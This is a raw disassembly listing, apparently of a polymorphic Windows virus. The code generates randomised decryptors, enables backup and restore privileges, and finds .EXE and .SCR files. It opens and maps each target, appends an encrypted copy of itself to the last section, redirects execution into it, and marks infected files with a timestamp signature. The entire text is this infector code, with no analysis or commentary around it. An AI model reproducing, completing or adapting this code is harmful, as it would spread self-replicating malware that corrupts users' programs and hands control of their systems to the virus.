test dword ptr [ebp+1039C0h], 1000h
mov ax, 0C081h
jz short loc_433BCD
add ah, 8
loc_433BCD: ; CODE XREF: .rsrc:00433BC8�j
or ah, [ebp+1039BAh]
stosw
loc_433BD5: ; CODE XREF: .rsrc:00433B86�j
movzx eax, byte ptr [ebp+1039BEh]
stosd
loc_433BDD: ; CODE XREF: .rsrc:00433B6A�j
call sub_43376D
test dword ptr [ebp+1039C0h], 40000000h
jz short loc_433BFC
mov al, 50h
add al, [ebp+1039B8h]
stosb
call sub_43376D
loc_433BFC: ; CODE XREF: .rsrc:00433BEC�j
lea ecx, [edi-2]
mov [ebp+1042CCh], ecx
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_433C28
mov al, 0E8h
stosb
mov eax, [ebp+1042F0h]
sub eax, edi
sub eax, 4
stosd
mov [ebp+1042F0h], edi
jmp short loc_433C2D
; ---------------------------------------------------------------------------
loc_433C28: ; CODE XREF: .rsrc:00433C0F�j
call sub_4337DF
loc_433C2D: ; CODE XREF: .rsrc:00433C26�j
call sub_43376D
test dword ptr [ebp+1039C0h], 10000h
jnz short loc_433C49
mov al, 40h
or al, [ebp+1039B8h]
stosb
jmp short loc_433C58
; ---------------------------------------------------------------------------
loc_433C49: ; CODE XREF: .rsrc:00433C3C�j
mov ax, 0C083h
or ah, [ebp+1039B8h]
stosw
mov al, 1
stosb
loc_433C58: ; CODE XREF: .rsrc:00433C47�j
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_433C93
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_433C8A
mov al, 0C0h
or al, [ebp+1039BAh]
mov ah, [ebp+1039BFh]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_433C92
; ---------------------------------------------------------------------------
loc_433C8A: ; CODE XREF: .rsrc:00433C6E�j
mov al, 40h
or al, [ebp+1039BAh]
loc_433C92: ; CODE XREF: .rsrc:00433C88�j
stosb
loc_433C93: ; CODE XREF: .rsrc:00433C62�j
test dword ptr [ebp+1039C0h], 80000h
jnz short loc_433CAF
mov ax, 0E883h
or ah, [ebp+1039B9h]
stosw
mov al, 1
jmp short loc_433CB7
; ---------------------------------------------------------------------------
loc_433CAF: ; CODE XREF: .rsrc:00433C9D�j
mov al, 48h
or al, [ebp+1039B9h]
loc_433CB7: ; CODE XREF: .rsrc:00433CAD�j
stosb
call sub_43376D
test dword ptr [ebp+1039C0h], 100000h
mov cl, 75h
jnz short loc_433CF0
mov ax, 0F883h
or ah, [ebp+1039B9h]
stosw
xor eax, eax
stosb
sub [ebp+1042CCh], edi
test dword ptr [ebp+1039C0h], 200000h
jnz short loc_433D0B
mov cl, 77h
jmp short loc_433D0B
; ---------------------------------------------------------------------------
loc_433CF0: ; CODE XREF: .rsrc:00433CC9�j
mov ax, 1809h
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
sub [ebp+1042CCh], edi
loc_433D0B: ; CODE XREF: .rsrc:00433CEA�j
; .rsrc:00433CEE�j
mov al, cl
mov ah, [ebp+1042CCh]
stosw
mov al, 58h
add al, [ebp+1039B8h]
stosb
call sub_43376D
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_433D5B
test dword ptr [ebp+1039C0h], 8000000h
jnz short loc_433D5B
test dword ptr [ebp+1039C0h], 6000000h
jnz short loc_433D51
call sub_4336FB
call sub_43376D
loc_433D51: ; CODE XREF: .rsrc:00433D45�j
call sub_433727
call sub_43376D
loc_433D5B: ; CODE XREF: .rsrc:00433D2D�j
; .rsrc:00433D39�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_433D6F
mov al, 0C9h
stosb
call sub_43376D
loc_433D6F: ; CODE XREF: .rsrc:00433D65�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_433DA5
mov al, 7
sub al, [ebp+1039B8h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+1039B8h]
shl ah, 3
add ah, 4
stosd
call sub_43376D
mov al, 61h
stosb
call sub_43376D
loc_433DA5: ; CODE XREF: .rsrc:00433D79�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
stosw
call sub_43376D
test dword ptr [ebp+1039C0h], 20h
jz short loc_433E31
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_433DED
mov eax, edi
mov ecx, [ebp+1042F0h]
sub eax, ecx
mov [ecx-4], eax
call sub_4337DF
call sub_43376D
mov al, 0C3h
stosb
call sub_43376D
loc_433DED: ; CODE XREF: .rsrc:00433DCC�j
mov eax, edi
mov ecx, [ebp+1042C4h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+1039B8h]
stosb
call sub_43376D
test dword ptr [ebp+1039C0h], 800000h
jz short loc_433E20
mov ax, 0C350h
or al, [ebp+1039B8h]
jmp short loc_433E2A
; ---------------------------------------------------------------------------
loc_433E20: ; CODE XREF: .rsrc:00433E12�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
loc_433E2A: ; CODE XREF: .rsrc:00433E1E�j
stosw
call sub_43376D
loc_433E31: ; CODE XREF: .rsrc:00433DC0�j
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_433E9C
mov ecx, edi
mov eax, [ebp+1042DCh]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+1039C0h], 1000000h
jnz short loc_433E66
lea eax, [ebp+1039B8h]
loc_433E5E: ; CODE XREF: .rsrc:00433E64�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_433E5E
loc_433E66: ; CODE XREF: .rsrc:00433E56�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_433E7B
mov ax, 0C031h
stosw
loc_433E7B: ; CODE XREF: .rsrc:00433E73�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_433E94
mov ax, 0C031h
stosw
loc_433E94: ; CODE XREF: .rsrc:00433E8C�j
mov al, 0C3h
stosb
call sub_43376D
loc_433E9C: ; CODE XREF: .rsrc:00433E3B�j
lea eax, [ebp+1039CCh]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_433EB4
push edi
sub edi, eax
pop eax
jmp short loc_433ECD
; ---------------------------------------------------------------------------
loc_433EB4: ; CODE XREF: .rsrc:00433EAC�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_433ECD: ; CODE XREF: .rsrc:00433EB2�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_433EED
neg eax
loc_433EED: ; CODE XREF: .rsrc:00433EE9�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_433EF1 proc near ; CODE XREF: sub_43445B+336�p
push esi
push edi
cmp dword ptr [ebp+104300h], 0
jz loc_4340D9
call near ptr loc_433F11+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_433F11: ; CODE XREF: sub_433EF1+F�p
add bh, bh
sub_433EF1 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
mov [ebp+104314h], eax
push ebx
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_433414
mov edx, [ebp+1042F4h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+104318h], eax
add eax, [edx+8]
mov [ebp+10431Ch], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_433414
mov edi, [ebp+1042F4h]
push esi
call sub_433414
mov edx, [ebp+1042F4h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_4340D9
jz loc_4340D9
add esi, [ebp+1042F8h]
add esi, [ebp+1042B4h]
; START OF FUNCTION CHUNK FOR sub_4340AA
loc_433F8B: ; CODE XREF: sub_4340AA+29�j
lodsb
cmp al, 0E8h
jnz loc_434036
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call sub_433414
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_433FB9
cmp eax, [edi+0Ch]
jnb loc_4340D2
jmp short loc_433FC5
; ---------------------------------------------------------------------------
loc_433FB9: ; CODE XREF: sub_4340AA-FE�j
cmp [ebp+1042F4h], edx
jnz loc_4340D2
loc_433FC5: ; CODE XREF: sub_4340AA-F3�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_4340D2
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_433414
cmp [ebp+1042F4h], edi
jnz loc_4340D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_4340D2
cmp eax, [edi+8]
jnb loc_4340D2
loc_43400E: ; CODE XREF: sub_4340AA+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_4340E8
jmp loc_4340D2
; ---------------------------------------------------------------------------
loc_434036: ; CODE XREF: sub_4340AA-11C�j
cmp al, 0FFh
jnz loc_4340D2
cmp byte ptr [esi], 15h
jnz loc_4340D2
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_433414
cmp [ebp+1042F4h], edi
jnz short loc_4340D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_43407F
cmp eax, [ebp+10431Ch]
jb short loc_4340E8
loc_43407F: ; CODE XREF: sub_4340AA-35�j
cmp eax, 70000000h
jb short loc_4340BD
call sub_4340AA
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_4340A9
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_4340C4
; ---------------------------------------------------------------------------
locret_4340A9: ; CODE XREF: sub_4340AA-F�j
retn
; END OF FUNCTION CHUNK FOR sub_4340AA
; =============== S U B R O U T I N E =======================================
sub_4340AA proc near ; CODE XREF: sub_4340AA-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 00433F8B SIZE 0000011F BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call sub_43351B
popa
loc_4340BD: ; CODE XREF: sub_4340AA-26�j
test eax, 80000000h
jnz short loc_4340D2
loc_4340C4: ; CODE XREF: sub_4340AA-3�j
sub eax, [edi+0Ch]
jb short loc_4340D2
cmp eax, [edi+8]
jb loc_43400E
loc_4340D2: ; CODE XREF: sub_4340AA-F9�j
; sub_4340AA-EB�j ...
dec ecx
jnz loc_433F8B
loc_4340D9: ; CODE XREF: sub_433EF1+9�j
; .rsrc:00433F73�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_43412A
; ---------------------------------------------------------------------------
loc_4340E8: ; CODE XREF: sub_4340AA-7F�j
; sub_4340AA-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_43412A: ; CODE XREF: sub_4340AA+3C�j
pop edi
pop esi
retn
sub_4340AA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43412D proc near ; CODE XREF: .rsrc:0043442E�p
; FUNCTION CHUNK AT 00434257 SIZE 00000002 BYTES
push edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jnz loc_434257
push eax
push esp
push 28h
push 0FFFFFFFFh
call dword ptr [ebp+103F1Ah]
test eax, eax
pop edi
js loc_434257
call sub_4325AF
call near ptr loc_434168+5
push ebx
db 65h
jz short near ptr unk_4341A6
imul ebp, [ebp+53h], 72756365h
loc_434168: ; CODE XREF: sub_43412D+2A�p
imul esi, [ecx+edi*2+41h], 88B5FF00h
sub_43412D endp ; sp-analysis failed
inc edx
adc [eax], al
call dword ptr [ebp+103E6Eh]
mov [ebp+104290h], eax
call near ptr loc_43419C+1
push ebx
db 65h
push esp
popa
imul esp, [ebp+4Fh], 77h
outsb
db 65h
jb short loc_434203
push 72507069h
imul esi, [esi+69h], 6567656Ch
loc_43419C: ; CODE XREF: .rsrc:0043417F�p
add [edi-18h], dl
sub eax, ebp
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
db 0E8h ; è
db 13h
db 0
unk_4341A6 db 0 ; CODE XREF: sub_43412D+30�j
db 0
db 53h ; S
db 65h ; e
db 52h ; R
db 65h ; e
db 73h ; s
db 74h ; t
db 6Fh ; o
db 72h ; r
db 65h ; e
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0Bh
db 0E8h ; è
db 0FFh
db 0FFh
db 0E8h ; è
db 12h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 42h ; B
db 61h ; a
db 63h ; c
db 6Bh ; k
db 75h ; u
db 70h ; p
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0EEh ; î
db 0E7h ; ç
db 0FFh
db 0FFh
db 0E8h ; è
db 18h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 43h ; C
db 68h ; h
db 61h ; a
db 6Eh ; n
db 67h ; g
db 65h ; e
db 4Eh ; N
db 6Fh ; o
db 74h ; t
db 69h ; i
db 66h ; f
db 79h ; y
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0CBh ; Ë
db 0E7h ; ç
db 0FFh
db 0FFh
db 50h ; P
db 54h ; T
; ---------------------------------------------------------------------------
loc_434203: ; CODE XREF: .rsrc:0043418D�j
lea eax, [ebp+103DCCh]
push 64h
push eax
push 1
push edi
call dword ptr [ebp+103F26h]
mov [esp], edi
call dword ptr [ebp+103E62h]
sub al, al
lea edi, [ebp+104184h]
push eax
push eax
push eax
push dword ptr [ebp+103DCCh]
push 40001h
push esp
push 1
push edi
call dword ptr [ebp+104290h]
push esp
push 4
push edi
call dword ptr [ebp+104290h]
add esp, 14h
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E9Eh]
; START OF FUNCTION CHUNK FOR sub_43412D
loc_434257: ; CODE XREF: sub_43412D+A�j
; sub_43412D+1F�j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_43412D
; =============== S U B R O U T I N E =======================================
sub_434259 proc near ; CODE XREF: .rsrc:00434427�p
; .rsrc:00434433�p ...
lea esi, [ebp+104184h]
push esi
call dword ptr [ebp+103EA2h]
cmp eax, 0FFFFFFFFh
jz locret_43432A
mov [ebp+104294h], eax
push 0
push esi
call dword ptr [ebp+103EDEh]
test eax, eax
jz locret_43432A
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+103E7Eh]
cmp eax, 0FFFFFFFFh
jz loc_4348AB
mov [ebp+104298h], eax
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+103EAAh]
cmp eax, 0FFFFFFFFh
jz loc_43489F
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EA6h]
cmp eax, 0FFFFFFFFh
jz loc_43489F
mov [ebp+1042ACh], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E82h]
test eax, eax
jz loc_43489F
xor ecx, ecx
mov [ebp+1042B0h], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+103ECAh]
test eax, eax
jz loc_434877
mov [ebp+1042B4h], eax
locret_43432A: ; CODE XREF: sub_434259+10�j
; sub_434259+27�j ...
retn
sub_434259 endp
; ---------------------------------------------------------------------------
loc_43432B: ; CODE XREF: sub_43445B+188�p
; sub_43445B+2A0�p
mov eax, 7327h
mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
db 0F7h ; ÷
db 85h ; …
db 0C0h ; À
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042C0h], eax
mov eax, 29CBh
mov ecx, [ebx+3Ch]
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042B8h], eax
retn
; =============== S U B R O U T I N E =======================================
sub_434370 proc near ; CODE XREF: sub_43445B:loc_4344D0�p
; sub_43445B+1B4�p
movzx ecx, word ptr [ebx+6]
stc
loc_434375: ; CODE XREF: sub_434370+23�j
jecxz short locret_4343AC
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_4343AC
cmp dword ptr [edx+0Ch], 1
jb short loc_434375
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+1042ACh]
locret_4343AC: ; CODE XREF: sub_434370:loc_434375�j
; sub_434370+1D�j ...
retn
sub_434370 endp
; =============== S U B R O U T I N E =======================================
sub_4343AD proc near ; CODE XREF: .rsrc:00434445�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_4343AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4343BA: ; CODE XREF: .rsrc:004343DB�j
mov ecx, edi
jmp short loc_4343C9
; ---------------------------------------------------------------------------
lea edi, [ebp+104184h]
cld
loc_4343C5: ; CODE XREF: .rsrc:004343D7�j
mov ebx, edi
xor ecx, ecx
loc_4343C9: ; CODE XREF: .rsrc:004343BC�j
; .rsrc:004343DF�j
lodsb
cmp al, 61h
jb short loc_4343D4
cmp al, 7Ah
ja short loc_4343D4
sub al, 20h
loc_4343D4: ; CODE XREF: .rsrc:004343CC�j
; .rsrc:004343D0�j
stosb
cmp al, 5Ch
jz short loc_4343C5
cmp al, 2Eh
jz short loc_4343BA
cmp al, 0
jnz short loc_4343C9
jecxz short locret_4343AC
mov eax, [ecx]
cmp eax, 455845h
jz short loc_4343F7
cmp eax, 524353h
jnz locret_43432A
loc_4343F7: ; CODE XREF: .rsrc:004343EA�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_43432A
cmp eax, 4E554357h
jz locret_43432A
cmp eax, 32334357h
jz locret_43432A
cmp eax, 4F545350h
jz locret_43432A
xor ebx, ebx
call sub_434259
jnz short loc_43443E
call sub_43412D
call sub_434259
jz locret_43432A
loc_43443E: ; CODE XREF: .rsrc:0043442C�j
xor edx, edx
call sub_43445B
call sub_4343AD
call $+5
pop ebp
sub ebp, 10344Fh
jmp loc_434855
; =============== S U B R O U T I N E =======================================
sub_43445B proc near ; CODE XREF: .rsrc:00434440�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+1042B4h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_434855
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_434855
test dword ptr [ebx+16h], 2000h
jnz loc_434855
test byte ptr [ebx+5Ch], 2
jz loc_434855
mov eax, [ebx+8]
cmp eax, 0A0A0A0A0h
jz loc_434855
cmp eax, 20202020h
jz loc_434855
mov ecx, [ebx+0C8h]
jecxz short loc_4344D0
push ecx
call sub_433414
add ecx, [ebp+1042F8h]
add ecx, esi
and dword ptr [ecx+40h], 0
and dword ptr [ecx+44h], 0
loc_4344D0: ; CODE XREF: sub_43445B+5D�j
call sub_434370
jb loc_434855
and dword ptr [ebp+1042FCh], 0
mov eax, [edx+8]
mov ecx, [edx+10h]
sub eax, ecx
jnb short loc_4344F0
xor eax, eax
jmp short loc_4344F5
; ---------------------------------------------------------------------------
loc_4344F0: ; CODE XREF: sub_43445B+8F�j
add ecx, eax
mov [edx+10h], ecx
loc_4344F5: ; CODE XREF: sub_43445B+93�j
mov [ebp+1042BCh], eax
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call near ptr dword_432B50+43h
xor [ebp+1039BEh], dl
mov cl, 20h
xor [ebp+1039BFh], dh
loc_434517: ; CODE XREF: sub_43445B+D5�j
push 20h
dec cl
pop eax
js short loc_434532
call near ptr dword_432B50+43h
test edx, edx
setz dl
shl edx, cl
xor [ebp+1039C0h], edx
jmp short loc_434517
; ---------------------------------------------------------------------------
loc_434532: ; CODE XREF: sub_43445B+C1�j
test dword ptr [ebp+1039C0h], 2000000h
jz short loc_434560
test dword ptr [ebp+1039C0h], 3
jnz short loc_434556
and dword ptr [ebp+1039C0h], 0F7FFFFFFh
jmp short loc_434560
; ---------------------------------------------------------------------------
loc_434556: ; CODE XREF: sub_43445B+ED�j
or dword ptr [ebp+1039C0h], 10000000h
loc_434560: ; CODE XREF: sub_43445B+E1�j
; sub_43445B+F9�j ...
push 6
pop ecx
loc_434566: ; CODE XREF: sub_43445B+129�j
push 6
pop eax
call near ptr dword_432B50+43h
mov al, [ebp+1039B8h]
xchg al, [edx+ebp+1039B8h]
mov [ebp+1039B8h], al
loop loc_434566
test dword ptr [ebp+1039C0h], 8
jnz short loc_43459B
cmp byte ptr [ebp+1039BAh], 1
jz short loc_434560
loc_43459B: ; CODE XREF: sub_43445B+135�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_4345C2
cmp byte ptr [ebp+1039B8h], 5
jz short loc_434560
cmp byte ptr [ebp+1039B9h], 5
jz short loc_434560
cmp byte ptr [ebp+1039BAh], 5
jz short loc_434560
loc_4345C2: ; CODE XREF: sub_43445B+14A�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_4345D7
cmp byte ptr [ebp+1039B8h], 2
ja short loc_434560
loc_4345D7: ; CODE XREF: sub_43445B+171�j
and dword ptr [ebp+104300h], 0
call loc_433855
call loc_43432B
call sub_43485E
mov ebx, [ebp+1042B8h]
add ebx, [ebp+1042BCh]
call sub_434259
jz loc_434855
mov esi, [ebp+1042B4h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_434370
jb loc_434855
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_43464B
mov [ebp+104304h], edi
lea esi, [ebp+1039CCh]
mov ecx, [ebp+101069h]
rep movsb
loc_43464B: ; CODE XREF: sub_43445B+1DA�j
push edi
mov ecx, 0A73h
lea esi, [ebp+101000h]
rep movsd
mov cl, 0
jecxz short loc_43465F
rep movsb
loc_43465F: ; CODE XREF: sub_43445B+200�j
test dword ptr [ebp+1039C0h], 20000000h
jz loc_43471D
push dword ptr [ebx+28h]
call sub_433414
mov edx, [ebp+1042F4h]
test edx, edx
jz loc_43471D
mov esi, [ebp+1042B4h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_43469C
xor ecx, ecx
loc_43469C: ; CODE XREF: sub_43445B+23D�j
add esi, [edx+14h]
cmp ecx, [ebp+101069h]
mov ecx, [ebp+101069h]
jb short loc_434703
mov edi, [esp+14h+var_14]
and dword ptr [ebp+101069h], 0
and dword ptr [edi+69h], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+1042C8h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_4346DC
neg dword ptr [eax]
loc_4346DC: ; CODE XREF: sub_43445B+27D�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+104300h], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+1039C0h], 40h
jz short loc_4346FA
neg dword ptr [eax]
loc_4346FA: ; CODE XREF: sub_43445B+29B�j
push ecx
call loc_43432B
pop ecx
jmp short loc_43470F
; ---------------------------------------------------------------------------
loc_434703: ; CODE XREF: sub_43445B+250�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_43470F: ; CODE XREF: sub_43445B+2A6�j
lea esi, [ebp+1039CCh]
mov [ebp+104304h], edi
rep movsb
loc_43471D: ; CODE XREF: sub_43445B+20E�j
; sub_43445B+224�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+137h]
cmp dl, [ebp+1039BEh]
jnz short loc_434736
imul edx, 12345678h
loc_434736: ; CODE XREF: sub_43445B+2D3�j
mov [eax-19h], dx
call sub_432120
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
lea eax, [ecx+5]
jnz short loc_434768
mov [ebp+104300h], ecx
add eax, [ebp+101069h]
and dword ptr [edi+69h], 0
loc_434768: ; CODE XREF: sub_43445B+2F8�j
sub eax, [ebx+28h]
mov [edi+54h], eax
test dword ptr [ebp+103F7Ch], 1
jz short loc_434784
mov dword ptr [ebx+8], 0A0A0A0A0h
loc_434784: ; CODE XREF: sub_43445B+320�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_434797
push edx
call sub_433EF1
pop edx
loc_434797: ; CODE XREF: sub_43445B+333�j
mov ecx, [ebp+104300h]
jecxz short loc_4347A4
mov [ebx+28h], ecx
jmp short loc_4347B1
; ---------------------------------------------------------------------------
loc_4347A4: ; CODE XREF: sub_43445B+342�j
mov ecx, [ebp+1042FCh]
jecxz short loc_4347AE
jmp short loc_4347B1
; ---------------------------------------------------------------------------
loc_4347AE: ; CODE XREF: sub_43445B+34F�j
mov ecx, [ebx+28h]
loc_4347B1: ; CODE XREF: sub_43445B+347�j
; sub_43445B+351�j
test dword ptr [ebp+1039C0h], 3
jz short loc_4347D1
mov eax, [ebp+104304h]
add ecx, [ebp+1042ECh]
add eax, [ebp+1042E8h]
add [eax], ecx
loc_4347D1: ; CODE XREF: sub_43445B+360�j
mov ecx, [edx+10h]
mov eax, [ebp+1042B8h]
cmp [edx+8], ecx
jnb short loc_4347E2
mov [edx+8], ecx
loc_4347E2: ; CODE XREF: sub_43445B+382�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+1042C0h]
push 29CCh
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+1039BEh]
test dword ptr [ebp+1039C0h], 20000000h
jz short loc_434813
add ecx, [ebp+101069h]
loc_434813: ; CODE XREF: sub_43445B+3B0�j
mov dh, 0
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_434835
inc dh
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_434835
mov dh, [ebp+1039BFh]
loc_434835: ; CODE XREF: sub_43445B+3C4�j
; sub_43445B+3D2�j
test dword ptr [ebp+1039C0h], 4000h
jnz short loc_43484C
loc_434841: ; CODE XREF: sub_43445B+3ED�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_434841
jmp short loc_434855
; ---------------------------------------------------------------------------
loc_43484C: ; CODE XREF: sub_43445B+3E4�j
; sub_43445B+3F8�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_43484C
loc_434855: ; CODE XREF: .rsrc:00434456�j
; sub_43445B+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_43445B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43485E proc near ; CODE XREF: sub_43445B+18D�p
cmp dword ptr [ebp+104298h], 0
jz locret_43432A
push dword ptr [ebp+1042B4h]
call dword ptr [ebp+103EEEh]
loc_434877: ; CODE XREF: sub_434259+C5�j
push dword ptr [ebp+1042B0h]
call dword ptr [ebp+103E62h]
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EE2h]
loc_43489F: ; CODE XREF: sub_434259+6B�j
; sub_434259+82�j ...
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E62h]
loc_4348AB: ; CODE XREF: sub_434259+45�j
lea esi, [ebp+104184h]
push dword ptr [ebp+104294h]
push esi
call dword ptr [ebp+103EDEh]
and dword ptr [ebp+104298h], 0
retn
sub_43485E endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 1038CBh, 0C10FF058h, 10158885h
dd 0C3C08500h, 0F0FFC883h, 8885C10Fh, 0C3001015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h
dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104184B5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
